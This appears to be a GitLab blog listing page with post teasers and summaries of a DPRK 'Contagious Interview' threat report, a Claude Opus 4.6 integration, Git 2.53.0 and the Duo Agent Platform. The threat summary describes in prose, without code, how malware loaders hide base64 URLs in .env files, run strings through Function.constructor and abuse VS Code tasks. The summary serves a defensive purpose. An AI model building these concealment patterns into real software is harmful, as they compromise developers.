19 posts
Published on: April 30, 2026 12 min read Build an automated detection testing framework with GitLab CI/CD and Duo Learn how GitLab's Signals Engineering team built the WATCH framework to continuously validate our security monitoring pipeline. security security research features…
Published on: April 29, 2026 5 min read Teaching software development the easy way using GitLab Learn how University of Washington lecturer Stephen G. Dame uses GitLab for Education to manage student assignments, distribute course materials, and provide inline code feedback at s…
Published on: April 22, 2026 6 min read GitLab AI Hackathon 2026: Meet the winners Nearly 7,000 developers built 600+ AI agents and flows on GitLab Duo Agent Platform. Find out who won and what they created. AI/ML community AI writes code. That is expected now. But planning, sec…
Published on: April 20, 2026 7 min read Prepare your pipeline for AI-discovered zero-days AI is finding vulnerabilities faster than teams can patch. Learn how pipeline enforcement, automated triage, and AI remediation close the gap. AI/ML security DevSecOps platform Anthropic's…
Published on: April 15, 2026 12 min read A guide to the breaking changes in GitLab 19.0 GitLab 19.0 removes several deprecated features. Learn what's changing, which changes affect your deployment, and how to prepare before upgrading. product news GitLab 17.0 shipped with 80 bre…
Published on: April 14, 2026 7 min read GitLab and Vertex AI on Google Cloud: Advancing agentic software development Learn how Google Cloud customers are standardizing on GitLab and Vertex AI for foundation models, enterprise controls, and Model Garden breadth. AI/ML partners go…
Published on: April 13, 2026 6 min read GitLab named a 2026 Omdia Universe Leader Omdia's 2026 report on AI-assisted software development ranked 19 vendors. Here is what GitLab's top scores mean for engineering teams. research DevSecOps DevSecOps platform news GitLab is named a…
Published on: April 7, 2026 16 min read Pipeline security lessons from March supply chain incidents Learn how centralized pipeline policies can detect and block the patterns behind a series of recent attacks. security product tutorial features Note: The GitLab product did not us…
Published on: March 19, 2026 7 min read GitLab 18.10: Agentic AI now open to even more teams on GitLab Free GitLab.com teams can purchase GitLab Credits and start using AI agents and workflows, including flat-rate automated code review. features product Agentic AI is changing ho…
Published on: March 4, 2026 10 min read How GitLab built a security control framework from scratch GitLab's Security Compliance team created a custom control framework to scale across multiple certifications and products — here's why and how you can, too. security tutorial GitLa…
Published on: March 4, 2026 7 min read 10 AI prompts to speed your team’s software delivery Eliminate review backlogs, security delays, and coordination overhead with ready-to-use AI prompts covering every stage of the software lifecycle. AI/ML DevOps platform AI-assisted coding…
The GitLab Threat Intelligence Team has detailed its efforts to disrupt North Korean (DPRK) cyber campaigns, specifically focusing on "Contagious Interview" malware distribution and fraudulent IT worker schemes. By analyzing internal platform data, GitLab identified that these state-sponsored actors leverage legitimate tools and fake recruitment scenarios to compromise software developers and generate illicit revenue for the regime. The report concludes that while these operations are sophisticated and persistent, proactive monitoring and cross-industry intelligence sharing are essential to mitigating these evolving threats. ### Contagious Interview Mechanics * Threat actors pose as recruiters to trick software developers into executing malicious JavaScript projects under the guise of technical interviews. * The primary goal is to deploy malware families such as BeaverTail and Ottercookie, which facilitate credential theft and provide remote control of the victim's device. * A notable evolution in tradecraft includes the use of "ClickFix," a compiled BeaverTail variant identified in late 2025. * Malicious repositories often use a specific execution pattern where base64-encoded URLs and secret headers are hidden within `.env` files, masquerading as benign configuration variables. * To execute the payload, actors utilize `Function.constructor` to load strings as executable code, often triggered by custom error handlers designed to source remote content. ### 2025 Campaign Trends and Infrastructure * GitLab banned 131 unique accounts linked to these campaigns in 2025, with activity peaking in September and averaging 11 bans per month. * Nearly 90% of malicious accounts were created using Gmail addresses, and actors typically accessed the platform through consumer VPNs or dedicated VPS infrastructure. * In more than 80% of cases, malware payloads were not stored on GitLab. Instead, actors used concealed loaders to fetch content from legitimate hosting services, most commonly Vercel. * Recent tactics include the creation of malicious NPM dependencies immediately before use and the exploitation of VS Code tasks to pipe remote content into native shells. ### IT Worker Campaigns and Sanctions Evasion * Beyond malware distribution, DPRK actors use GitLab to support "IT worker" cells that generate revenue and evade international sanctions. * One identified pipeline involved the creation of at least 135 synthetic identities, automated to generate professional connections and contact leads at scale. * Threat actors have been observed adding their own images to stolen U.S. identity documents to bypass employment verification processes. * Forensic analysis revealed financial records from cell managers detailing revenue proceeds from 2022 through 2025, often earned while operating from locations like Moscow, Russia. Organizations should remain vigilant against recruitment-themed social engineering and scrutinize unexpected requests to run external code. GitLab recommends that the security community use the provided indicators of compromise to update defensive posture, as these actors continue to refine their ability to hide malicious intent within legitimate development workflows.
GitLab has integrated Anthropic’s Claude Opus 4.6 into its Duo Agent Platform, providing developers with a high-intelligence frontier model designed for complex agentic workflows. By combining a 1-million-token context window with native access to DevSecOps data, the update enables more autonomous task execution and deeper reasoning within the software development lifecycle. This integration allows teams to delegate multi-step tasks to AI agents that can now process entire codebases and project histories in a single interaction. ## Advanced Agentic Capabilities and Reasoning * Claude Opus 4.6 features enhanced "agentic" behavior, meaning it can proactively take actions and drive tasks forward with minimal human intervention. * The model supports multi-agent orchestration, allowing it to spin up subagents and coordinate parallel workstreams to solve complex, multi-step problems. * Adaptive thinking capabilities allow the model to calibrate its reasoning depth based on the query, using extended thinking for difficult tasks while maintaining speed for simpler ones. * Deep reasoning via test-time compute helps the model navigate challenging development bottlenecks and architectural decisions. ## Full-Context DevSecOps Integration * The model boasts a 1-million-token context window—a fivefold increase over Opus 4.5—enabling the processing of massive codebases and extensive documentation. * Integration with the GitLab Duo Agent Platform provides the model with direct access to repositories, merge requests, pipelines, and security findings. * Enterprise-grade security features, including human-in-the-loop controls and group-based access, ensure that agentic actions remain transparent and governed. * Native integration ensures developers can utilize these frontier capabilities without leaving their established GitLab workflows. ## Availability and Resource Consumption * Opus 4.6 is currently available for GitLab.com users via the Duo Agent Platform and Agentic Chat, though it is not supported for GitLab Duo Classic features. * Support for the model within various Integrated Development Environments (IDEs) is expected to be released in the near future. * Usage is managed via GitLab credits, with multipliers determined by the size of the prompt. * Prompts containing 200k tokens or fewer are charged at 1.2 requests per credit, while larger prompts exceeding 200k tokens are charged at 0.7 requests per credit. Organizations aiming to automate complex development workstreams should migrate their specialized agents to Claude Opus 4.6 to take advantage of its superior orchestration and context handling. By leveraging the model's ability to coordinate parallel subagents, teams can significantly reduce the manual effort required for codebase-wide refactors and security remediation.
Git 2.53.0 introduces significant performance and maintenance improvements, specifically targeting large repositories and complex history rewriting workflows. Key updates include compatibility between geometric repacking and partial clones, as well as more granular control over commit signatures during imports. These enhancements collectively move Git toward more efficient repository management and better data integrity for modern development environments. ## Geometric Repacking Support with Promisor Remotes * Git utilizes repacking to consolidate loose objects into packfiles, with the "geometric" strategy maintaining a size-based progression to minimize the computational overhead found in "all-into-one" repacks. * Previously, geometric repacking was incompatible with partial clones because it could not correctly identify or manage "promisor" packfiles, which contain the metadata for objects expected to be backfilled from a remote. * The 2.53.0 release enables geometric repacking to process promisor packfiles separately, preserving the promisor marker and preventing the tool from crashing when used within a partial clone repository. * This fix removes a major blocker for making the geometric strategy the default repacking method for all Git repositories. ## Preserving Valid Signatures in git-fast-import(1) * The `git-fast-import` tool, a backend for high-volume data ingestion and history rewriting, previously lacked the nuance to handle commit signatures during partial repository edits. * A new `strip-if-invalid` mode has been added to the `--signed-commits` option to solve the "all-or-nothing" problem where users had to choose between keeping broken signatures or stripping valid ones. * This feature allows Git to automatically detect which signatures remain valid after a rewrite and only strip those that no longer match their modified commits. * This provides a foundation for tools like `git-filter-repo` to preserve the chain of trust for unchanged commits during migration or cleaning operations. ## Expanded Data in git-repo-structure * The `structure` subcommand of `git-repo`, intended as a native alternative to the `git-sizer` utility, now provides deeper insights into repository scaling. * The command now reports the total inflated size and actual disk size of all reachable objects, categorized by type: commits, trees, blobs, and tags. * These metrics are essential for administrators managing massive repositories, as they help identify which object types are driving disk consumption and impacting performance. These updates reflect Git’s continued focus on scalability and developer experience, particularly for organizations managing massive codebases. Users of partial clones and repository migration tools should consider upgrading to 2.53.0 to leverage the improved repacking logic and more sophisticated signature handling.
The GitLab Duo Agent Platform has reached general availability, marking a shift from basic AI code assistance to comprehensive agentic automation across the entire software development lifecycle. By orchestrating intelligent agents to handle complex tasks like security analysis and planning, the platform aims to resolve the "AI paradox" where faster code generation often creates downstream bottlenecks in review and deployment. ### Usage-Based Economy via GitLab Credits * GitLab is introducing "GitLab Credits," a virtual currency used to power the platform’s usage-based AI features. * Premium and Ultimate subscribers receive monthly credits ($12 and $24 respectively) at no additional cost to facilitate immediate adoption. * Organizations can manage a shared pool of credits or opt for on-demand monthly billing, with existing Duo Enterprise contracts eligible for conversion into credits. ### Agentic Chat and Contextual Orchestration * The Duo Agentic Chat provides a unified experience across the GitLab Web UI and various IDEs, including VS Code, JetBrains, Cursor, and Windsurf. * The chat utilizes multi-step reasoning to perform actions autonomously, drawing from the context of issues, merge requests, pipelines, and security findings. * Capabilities extend beyond code generation to include infrastructure-as-code (IaC) creation, pipeline troubleshooting, and explaining vulnerability reachability. ### Specialized Foundational and Custom Agents * **Foundational Agents:** Pre-built specialists designed for specific roles, such as the Planner Agent for breaking down work and the Security Analyst Agent for triaging vulnerabilities. * **Custom Agents:** Developed through a central AI Catalog, these allow teams to build and share agents that adhere to organization-specific engineering standards and guardrails. * **External Agents:** Native integration of third-party AI tools, such as Anthropic’s Claude Code and OpenAI’s Codex CLI, provides access to external LLM capabilities within the governed GitLab environment. ### Automated End-to-End Flows * The platform introduces "Flows," which are multi-step agentic sequences designed to automate repeatable transitions in the development cycle. * The "Issue to Merge Request" flow builds structured code changes directly from defined requirements to jumpstart development. * Specialized CI/CD flows help teams modernize pipeline configurations and automatically analyze and suggest fixes for failed pipeline runs. * The Code Review flow streamlines the feedback loop by providing AI-native analysis of merge request comments and code changes. To maximize the impact of agentic AI, organizations should move beyond basic chat interactions and begin integrating these specialized agents into their broader orchestration workflows to eliminate manual handoffs between planning, coding, and security.